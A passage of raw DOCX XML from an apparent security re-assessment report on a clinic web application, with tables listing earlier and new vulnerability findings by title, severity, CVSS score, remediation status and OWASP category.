            <w:tcW w:type="dxa" w:w="1260"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">VERIFIED OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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main branch config.py still contains fallback value. Runtime fix not confirmed from source.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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F-02</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Lack of JWT Token Revocation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>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B7950B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1260"/>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B7950B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">UNVERIFIED</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TokenBlocklist architecture referenced in prior report not confirmed in staging branch source code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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F-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Insecure Parsing - Unstructured Docs (DoS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>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B7950B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1260"/>
            <w:gridSpan w:val="1"/>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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">PARTIALLY REMEDIATED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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PyMuPDF and python-docx removed. However, new pandas-based parsing lacks robustness hardening (see V-08).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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F-04</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No Rate Limiting on Auth Endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>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B7950B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="126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VERIFIED OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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slowapi integration not present in staging branch. Brute-force attacks remain possible. Escalated to HIGH.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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F-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Permissive CORS &amp; Verbose Error Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>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B7950B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="126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VERIFIED OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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allow_origin_regex still present in source. Global exception handler still returns str(exc) to clients.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="FEF5E7" w:val="clear"/>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="180" w:right="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D35400"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">KEY FINDING: Source code on the GitHub repository (main branch) still contains all previously identified vulnerabilities. Remediations, if applied, exist only in the runtime deployment - not in the codebase. Any re-deployment will re-introduce all patched vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">4.  New Vulnerability Findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">This section details all security vulnerabilities identified during this re-assessment. Findings are ordered by descending severity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5DA3" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="80" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5DA3"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1  Findings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100"/>
        <w:gridCol w:w="1100"/>
        <w:gridCol w:w="1300"/>
        <w:gridCol w:w="1760"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="13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Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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OWASP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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V-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Hardcoded Credentials in Version Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="110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CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="130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OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="176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A07:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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V-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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JWT Secret Default Fallback in Source Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="110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CRITICAL</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9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="130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OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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A02:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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V-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Swagger UI Exposed on Staging Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="130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OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="176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A05:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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V-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Bulk Upload - MIME Type Confusion Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</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7.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="130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OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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A04:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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V-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Bulk Upload - CSV Formula Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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7.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="130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OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="176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A03:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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V-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Persistent: No Rate Limiting on Auth Endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</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7.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="130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OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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A04:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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V-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Bulk Upload - Path Traversal via Filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>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B7950B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="130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OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="176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A01:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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V-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Bulk Upload - Unbounded File Size / DoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>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B7950B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</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6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="130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OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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A04:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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V-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Persistent: Verbose Error Disclosure (HTTP 500)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>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B7950B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="130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OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="176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A05:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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V-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Persistent: Overly Permissive CORS Configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>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B7950B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</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5.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="130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OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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A05:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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V-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Missing Security Response Headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>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B7950B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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5.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="130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OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="176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A05:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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V-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Clinic Logo - Polyglot File Upload Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>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B7950B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</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5.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="130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OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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A04:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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V-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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JWT Tokens Stored in localStorage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>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B7950B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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4.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="130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OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="176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A07:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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V-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Sensitive Admin Scripts in Public Repository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:gridSpan w:val="1"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D35400"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</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7.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="130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OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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A05:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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V-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Undefined Doctor Role RBAC Boundary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:gridSpan w:val="1"/>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bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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3.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="130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OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="176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A01:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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V-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Placeholder Values in Deployment Config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1100"/>
            <w:gridSpan w:val="1"/>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bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="11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2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="130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OPEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="17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A05:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
